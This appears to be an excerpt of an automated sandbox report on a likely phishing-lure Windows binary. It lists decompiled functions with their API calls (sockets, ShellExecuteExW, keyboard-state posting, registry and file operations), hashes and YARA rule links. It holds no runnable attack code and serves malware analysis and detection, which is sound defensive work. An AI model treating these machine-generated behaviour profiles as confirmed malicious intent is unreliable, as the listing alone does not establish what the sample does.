Opcode Fuzzy Hash: e49de757dfa980f2c2dd1d38f6bd800e95e99d63e5ec212ef2129415c2322b5f
Instruction Fuzzy Hash: 52014FF6910208BFE750A7A19D89FEA776CD708301F0009A9BB45D2151EA749E868B71

Uniqueness

Uniqueness Score: -1.00%

Function 00C3D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

GetSystemMetrics.USER32(0000000F), ref: 00C3D78A
GetSystemMetrics.USER32(0000000F), ref: 00C3D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C3D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C3DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C3DA24
ShowWindow.USER32(00000003,00000000), ref: 00C3DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00C3DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C3DA8B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: b93b188be30ecf2f78327c62e8f08fb651486b02cf2b733834fc5bbb22b6e8e2
Instruction ID: 02cffbed1e9f884a2746a4c941100c0ed2b059fb5345edd05fcbd377e2e58fb1
Opcode Fuzzy Hash: b93b188be30ecf2f78327c62e8f08fb651486b02cf2b733834fc5bbb22b6e8e2
Instruction Fuzzy Hash: C1B19A71A00219EBDF14CF69DAC57BD7BB1BF04701F088069EC5A9B295DB34AA90DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BEC417,00000004,00000000,00000000,00000000), ref: 00BB2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00BEC417,00000004,00000000,00000000,00000000,000000FF), ref: 00BB2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00BEC417,00000004,00000000,00000000,00000000), ref: 00BEC46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BEC417,00000004,00000000,00000000,00000000), ref: 00BEC4D6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 10ef398947f76da44339f149514b443dc71cf6000af159244054ddf08bf98b22
Instruction ID: 393e16fb68e8422327e67104ca3bcf6f0e95e45a57aecb8e9a400ee88fe59e69
Opcode Fuzzy Hash: 10ef398947f76da44339f149514b443dc71cf6000af159244054ddf08bf98b22
Instruction Fuzzy Hash: A441F831614AC09BC7399B298CD9BFA7FE2EB45300F2488DDE047866A1C7F5A843D711

Uniqueness

Uniqueness Score: -1.00%

Function 00C17368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C1737F

Part of subcall function 00BD0FF6: std::exception::exception.LIBCMT ref: 00BD102C
Part of subcall function 00BD0FF6: __CxxThrowException@8.LIBCMT ref: 00BD1041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C173B6
EnterCriticalSection.KERNEL32(?), ref: 00C173D2
_memmove.LIBCMT ref: 00C17420
_memmove.LIBCMT ref: 00C1743D
LeaveCriticalSection.KERNEL32(?), ref: 00C1744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C17461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C17480

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 141b495620498e20ecdecedeec6b8b2d73a17bffc39e26d842d01b00f189df9f
Instruction ID: 3b7753731adca1b9f24f4b5b19205fcb54b28373859fed4269076dfc086c2b4e
Opcode Fuzzy Hash: 141b495620498e20ecdecedeec6b8b2d73a17bffc39e26d842d01b00f189df9f
Instruction Fuzzy Hash: 2A31C131904205EBCF10EF94DC85FAFBBB8EF45300F1441AAF9049B256DB709A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C36442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C3645A
GetDC.USER32(00000000), ref: 00C36462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C3646D
ReleaseDC.USER32(00000000,00000000), ref: 00C36479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C364B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C364C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C39299,?,?,000000FF,00000000,?,000000FF,?), ref: 00C36500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C36520

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: e8482329a787731035d07614af7a3ef10c6af8a63bafbcd57d89c9a3870eb6db
Instruction ID: 4397f13890bee7ce146eb43be520798335747225439bc5346db503ea300214cc
Opcode Fuzzy Hash: e8482329a787731035d07614af7a3ef10c6af8a63bafbcd57d89c9a3870eb6db
Instruction Fuzzy Hash: 1F319C72611214BFEB108F10CC8AFEA3FA9EF09761F044069FE089A2A1C7759D42CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00C0C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C0C087
_memcmp.LIBCMT ref: 00C0C0A9
_memcmp.LIBCMT ref: 00C0C0C1
_memcmp.LIBCMT ref: 00C0C0D4
_memcmp.LIBCMT ref: 00C0C0EE
_memcmp.LIBCMT ref: 00C0C101
_memcmp.LIBCMT ref: 00C0C119
_memcmp.LIBCMT ref: 00C0C134

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: bbe8d13990ad1f8f9f18e8133046a7a4945de98cf6e7f961e6a01a000cc4d1ab
Instruction ID: acbb70f0a34a6a9c6d06d882c657d35c1a35bbddafef5897bb06ebe2c798e7f2
Opcode Fuzzy Hash: bbe8d13990ad1f8f9f18e8133046a7a4945de98cf6e7f961e6a01a000cc4d1ab
Instruction Fuzzy Hash: 2E21D175A00205BBE220AB258CC3FAF679DEF203A8B480121FD05963C3F751DE11C2A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C1ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

Part of subcall function 00BCFEC6: _wcscpy.LIBCMT ref: 00BCFEE9

_wcstok.LIBCMT ref: 00C1EEFF
_wcscpy.LIBCMT ref: 00C1EF8E
_memset.LIBCMT ref: 00C1EFC1

Strings

X, xrefs: 00C1EFFE

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: d137b53e0f2f1f7fc9ca314dfc641abeb3d547836947f94766f76159aabf7c35
Instruction ID: 0d0ba30d5b0800dd737b9cae5ebf80a96debb8b1af5b34fb693046a3e52f36da
Opcode Fuzzy Hash: d137b53e0f2f1f7fc9ca314dfc641abeb3d547836947f94766f76159aabf7c35
Instruction Fuzzy Hash: 9FC170715083409FC724EF24C885AAEB7E4FF85310F1449ADF999972A2DB70ED46DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00C26E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C26F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C26F35
WSAGetLastError.WSOCK32(00000000), ref: 00C26F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00C26FFE
inet_ntoa.WSOCK32(?), ref: 00C26FBB

Part of subcall function 00C0AE14: _strlen.LIBCMT ref: 00C0AE1E
Part of subcall function 00C0AE14: _memmove.LIBCMT ref: 00C0AE40

_strlen.LIBCMT ref: 00C27058
_memmove.LIBCMT ref: 00C270C1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 9fa46edc6a794edb5840d6c7a16db45363033afb9ff2342fedb7977bf4d7a29a
Instruction ID: ec95964046752127ac4f25e4194e2a45850961f3d7294cf10cf616e868e89d88
Opcode Fuzzy Hash: 9fa46edc6a794edb5840d6c7a16db45363033afb9ff2342fedb7977bf4d7a29a
Instruction Fuzzy Hash: 7181B071508310ABD720EF24DC81FABB7E9AF84714F104A5DF5559B292DBB0EE05C792

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d7254e121d53da18e896a7d3c85af7c220cd31fb850e4dcc16362291fb472f
Instruction ID: d47325d4ce44f7986de14f17d90ada8d7afdd2c2a5a0992484169fbaa6a18a54
Opcode Fuzzy Hash: a6d7254e121d53da18e896a7d3c85af7c220cd31fb850e4dcc16362291fb472f
Instruction Fuzzy Hash: C7716630900109EFCB148F99C898AFFBBB8FF85310F508589F915AA251C774AA11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01578100), ref: 00C3B6A5
IsWindowEnabled.USER32(01578100), ref: 00C3B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C3B795
SendMessageW.USER32(01578100,000000B0,?,?), ref: 00C3B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00C3B809
GetWindowLongW.USER32(01578100,000000EC), ref: 00C3B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C3B843

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 8ee62ce925c06ca86a1508e3a47f903dfeb86020c56fc6547a3b92cd7058a32e
Instruction ID: a76fddf4e91de85cdf45a97be50d2bb1e53e88064c9bb584023b034e64eeb02f
Opcode Fuzzy Hash: 8ee62ce925c06ca86a1508e3a47f903dfeb86020c56fc6547a3b92cd7058a32e
Instruction Fuzzy Hash: 2D71B174A10204AFDB24DF64C896FBA7BB9FF4A340F14445DFA65972A2C731AE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C2F75C
_memset.LIBCMT ref: 00C2F825
ShellExecuteExW.SHELL32(?), ref: 00C2F86A

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

Part of subcall function 00BCFEC6: _wcscpy.LIBCMT ref: 00BCFEE9

GetProcessId.KERNEL32(00000000), ref: 00C2F8E1
CloseHandle.KERNEL32(00000000), ref: 00C2F910

Strings

@, xrefs: 00C2F839

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: c0cc71d3050d9466334598fda9d6f6bd10c149a48bc207333e6e8803c2bc24a1
Instruction ID: ad211d928de8e8ed4b2008eda6d1458d65f1fe7045d09bfb5d7cf8955ed73bac
Opcode Fuzzy Hash: c0cc71d3050d9466334598fda9d6f6bd10c149a48bc207333e6e8803c2bc24a1
Instruction Fuzzy Hash: B0619F75A006299FCB14EF54D480AAEFBF5FF49310B1484ADE855AB7A1CB70AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C1145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C1149C
GetKeyboardState.USER32(?), ref: 00C114B1
SetKeyboardState.USER32(?), ref: 00C11512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C11540
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C1155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C115A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C115C8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3692cbc4951c1602dc3e2edcbd9ed579df33e76cf15f481088958e5167569a1b
Instruction ID: d113bfd44f771457d05ac421284569fe94fa91f707bc60ae5295781e15ccd27c
Opcode Fuzzy Hash: 3692cbc4951c1602dc3e2edcbd9ed579df33e76cf15f481088958e5167569a1b
Instruction Fuzzy Hash: D551F1A0A147D53EFB3242248C05BFABEAA5B47304F0C8489EAE6458C2C29DDED4F750

Uniqueness

Uniqueness Score: -1.00%

Function 00C11276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C112B5
GetKeyboardState.USER32(?), ref: 00C112CA
SetKeyboardState.USER32(?), ref: 00C1132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C11357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C11374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C113B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C113D9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bc6ef265c0b3d593b34786ef7c09c0b6ce40ba98e76a8b3779e30d4cebde437e
Instruction ID: 0d628ea50a6b7d725d1bebd2720733e0e0232bf0c311418a731539bf61e76848
Opcode Fuzzy Hash: bc6ef265c0b3d593b34786ef7c09c0b6ce40ba98e76a8b3779e30d4cebde437e
Instruction Fuzzy Hash: 9D51E1A09147D53DFB3286248C45BFABEA95B07300F0C8489EAF446CD2D298AED4F751

Uniqueness

Uniqueness Score: -1.00%

Function 00C1589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C158AC
_wcsncpy.LIBCMT ref: 00C158E1
_wcsncpy.LIBCMT ref: 00C15913
_wcsncpy.LIBCMT ref: 00C15946
_wcsncpy.LIBCMT ref: 00C15988
_wcsncpy.LIBCMT ref: 00C159C2
_wcsncpy.LIBCMT ref: 00C159F1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: ecbd86217878bbbf319e03e7bc25e0ff7a655501430175f6559f18bd456f2936
Instruction ID: 51f1978e4ffd4e8a187b5e1f01fdf1611944fde2fde8c48bcb28d910e3678ca1
Opcode Fuzzy Hash: ecbd86217878bbbf319e03e7bc25e0ff7a655501430175f6559f18bd456f2936
Instruction Fuzzy Hash: 3041A3B9C20518B6CB10EBB488869CFB3E89F05710F5085A7F918E3222F734E755D7A6

Uniqueness

Uniqueness Score: -1.00%

Function 00C138AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C138D3,?), ref: 00C148C7

Part of subcall function 00C148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C138D3,?), ref: 00C148E0

lstrcmpiW.KERNEL32(?,?), ref: 00C138F3
_wcscmp.LIBCMT ref: 00C1390F
MoveFileW.KERNEL32(?,?), ref: 00C13927
_wcscat.LIBCMT ref: 00C1396F
SHFileOperationW.SHELL32(?), ref: 00C139DB

Strings

\*.*, xrefs: 00C13969

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 4d6b76e276f5455400afabf59b25f22e637726927f8d1c7e54573c2d71dcc5ca
Instruction ID: a3f5bc9b4f39edf46bff3284bb13fb677b6d39830ae7fba35556a85abc2c50b7
Opcode Fuzzy Hash: 4d6b76e276f5455400afabf59b25f22e637726927f8d1c7e54573c2d71dcc5ca
Instruction Fuzzy Hash: F741B1B15083849EC755EF64C481AEFB7ECAF89344F04092EB499C3261EA74D788D752

Uniqueness

Uniqueness Score: -1.00%

Function 00C37500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C37519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C375C0
IsMenu.USER32(?), ref: 00C375D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C37620
DrawMenuBar.USER32 ref: 00C37633

Strings

0, xrefs: 00C3750D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: a9d02a5c2793a4b44cd5a91454253b2069b699bd87b9d74abd9c07a6ef7542f1
Instruction ID: 0324844c7be13bd07729fe9e45b861eb17dc6dab55fb95234e41ec0d2eb1268b
Opcode Fuzzy Hash: a9d02a5c2793a4b44cd5a91454253b2069b699bd87b9d74abd9c07a6ef7542f1
Instruction Fuzzy Hash: 4E413BB5A14609EFDB20DF54D895E9ABBF8FF04350F048229F925A76A1D730AE50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C3122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C3125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C31286
FreeLibrary.KERNEL32(00000000), ref: 00C3133D

Part of subcall function 00C3122D: RegCloseKey.ADVAPI32(?), ref: 00C312A3
Part of subcall function 00C3122D: FreeLibrary.KERNEL32(?), ref: 00C312F5
